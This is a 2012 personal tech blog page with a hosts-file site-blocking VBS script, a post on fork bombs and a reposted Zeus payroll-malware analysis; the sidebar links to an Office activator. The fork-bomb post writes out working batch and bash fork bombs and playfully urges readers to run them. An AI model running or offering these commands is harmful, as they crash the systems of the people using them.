Give your Desktop a Mozaic Touch

Experience the Windows 8 Metro Stlye UI on your Computer

Windows 7 God Mode

Get an Advanced Control Panel in Windows7 by enabling God Mode

Download Internet Explorer 9

Enjoy The Internet in a New and Secure Way

Microsoft Office 2010 Professional Activation

Activator for Microsoft Office 2010 Professional 100% Working..!!

Flash Wallpapers for Mobile

More than 175 Flash/SWF wallpapers for Mobile with System Info

Tuesday, October 23, 2012

MyWall-Your own little firewall

A simple, small yet useful utility 
to save your time from unwanted websites.


All of us have one or the other important tasks to complete in the next couple of hours, but most of us usually waste most of our time socializing or hovering here and there over the internet and hence cannot focus on our work because of the turmoils coming from websites like facebook, twitter, youtube, etc.

It would be unfair to crown these sites as time-wasting, however because of the continuous updates, its actually very late when we realize that we have wasted a lot of time... atleast happens with me... :-P

Wondering, we had something that would disable these temporarily without much overhead....?
 
MyWall-Your own little firewall will help you toggle these (if you wish) in just a click

Did i forget to tell... You can also use this as a firewall to block as many sites you wish.
Useful in schools, small offices, even for your kids..

MyWall is a simple script written by me that will just in a click do 
all the overhead required to block and unblock websites in the 
back-end, which is usually a complex task to do.

I made this coz I'm lazy moving to antivirus firewall or the hosts file to 
block/unblock things...

You can Download MyWall from here.

All you have to do is extract the zip to a place.
Just a click will block the unwanted websites 
and clicking it again will unblock them.

PS: You may see a User Access Control warning dialog in Windows Vista or 7 – just say yes.
Don't worry its not a virus...! Its a home-made script... ;)
Also, if the script doesn't execute, whitelist it in your antivirus.
My Kaspersky blocks it...I whitelisted it and it works fine..!

Ya, you must be wondering which sites and how would it block...? 'eh

Yes..! The list is editable.
Just open the MyWall.vbs file (which you would get after extracting) in a text editor.
Notepad as usual. However I recommend Notepad++ as it would make things more clear.
Now edit WebsitesToBlock section (its in the beginning of the script) 
to include/remove any/other website(s) in the banned list. 

My predefined list which you'll already see in the script is:

WebsitesToBlock=Array("twitter.com", "www.youtube.com", "facebook.com")
 
Simple 'eh... :)
 
Cheers :)  

Saturday, August 25, 2012

Fork Bombs... Destructive Simplicity


Have you heard of fork bombs...?
If no try this...Experience yourself... ;)

PS: Try this on a VM (Virtual Machine) not on the actual machine

Copy this in a notepad file

-----------copy--here-------------
:fork
start %0
%0|%0
goto :fork
-----------copy--here-------------

save as anything.bat
Execute...!!
Enjoy...! make ur custom bombs... ;)

This is just to demonstrate how small codes can crash a system...
Don't try it on host machines...

For Linux (Fedora, Ubuntu, Redhat, CentOS)
this small piece of code will do the trick...

:(){ :|:& };:

type the above characters in a shell or terminal and press enter...

Don't Misuse....
This is just for knowledge...

Wednesday, May 2, 2012

Zeus Variant Targets Cloud-Based Payroll Service


          With critical business services migrating to the cloud, service providers have become a prime target for cybercriminals. In the latest example of financial malware targeting enterprises, we have discovered a Zeus attack that focuses on cloud payroll service providers. These attacks are designed to route funds to criminals, and bypass industrial strength security controls maintained by larger businesses.

Ceridian image-based authentication example          The researchers have captured a Zeus configuration that targets Ceridian, a Canadian human resources and payroll solutions provider. In this attack, Zeus captures a screenshot of a Ceridian payroll services web page (https://clients.powerpay.ca/powerpay/Logon*) when a corporate user whose machine is infected with the Trojan visits this website. This allows Zeus to steal the user id, password, company number and the icon selected by the user for the image-based authentication system.
 
          The financial losses associated with this type of attack can be significant. In August of last year, Cyberthieves reportedly funneled $217,000 from the Metropolitan Entertainment & Convention Authority (MECA). According to published reports an employee at MECA was victimized by a phishing e-mail and infected with malware that stole access credentials to the organization’s payroll system. With valid credentials, the cyberthieves were able to add fictitious employees to the MECA payroll. These money mules, who were hired through work-at-home scams, then received payment transfers from MECA's bank account which they sent to the fraudsters.

          We expect to see increased cybercriminal activity using this type of fraud scheme for the following reasons:
1) Targeting enterprise payroll systems enables attackers to siphon much larger amounts of money than by targeting individual consumers.

2) By stealing the login credentials belonging to enterprise users of these payroll services, fraudsters have everything they need to route payments to money mules before raising any red flags. Using these valid credentials fraudsters can also access personal, corporate and financial data without the need to hack into systems, while leaving very little evidence that malicious access is occurring.

3) By targeting a cloud service provider, the criminals are bypassing tight security mechanisms that are typically employed by medium to large enterprises. In a cloud service provider environment, the enterprise customers who use the service have no control over the vendor’s IT systems and thus little ability to protect their backend financial assets.

4) Cloud services can be accessed using unmanaged devices that are typically less secure and more vulnerable to infection by financial malware (e.g. Zeus)

Malware Attack Steals Cloud Applications Credentials
          Unfortunately, traditional antivirus security mechanisms are largely unable to protect corporate users from becoming infected with Zeus. That’s because attacks like this one are surgical in nature and use targeted reconnaissance combined with signature detection evasion techniques to get a foothold inside corporate computers.

          A better alternative for protecting sensitive cloud payroll, treasury, and other financial applications is to prevent malware from getting onto the endpoint in the first place. This requires a layered approach to security that looks for specific Crime Logic footprints, not signatures, to prevent malware on an infected machine from stealing login credentials.

          For example, Prevent malware from installing on a machine and secure communication between the computer and cloud service provider website to prevent common attack methods like HTML injection keylogging and screen capturing from grabbing data. Protect other web-based applications like VPNs, CRM, and collaboration systems that can be exploited by malware to steal user credentials and breach an enterprise’s security perimeter completely undetected.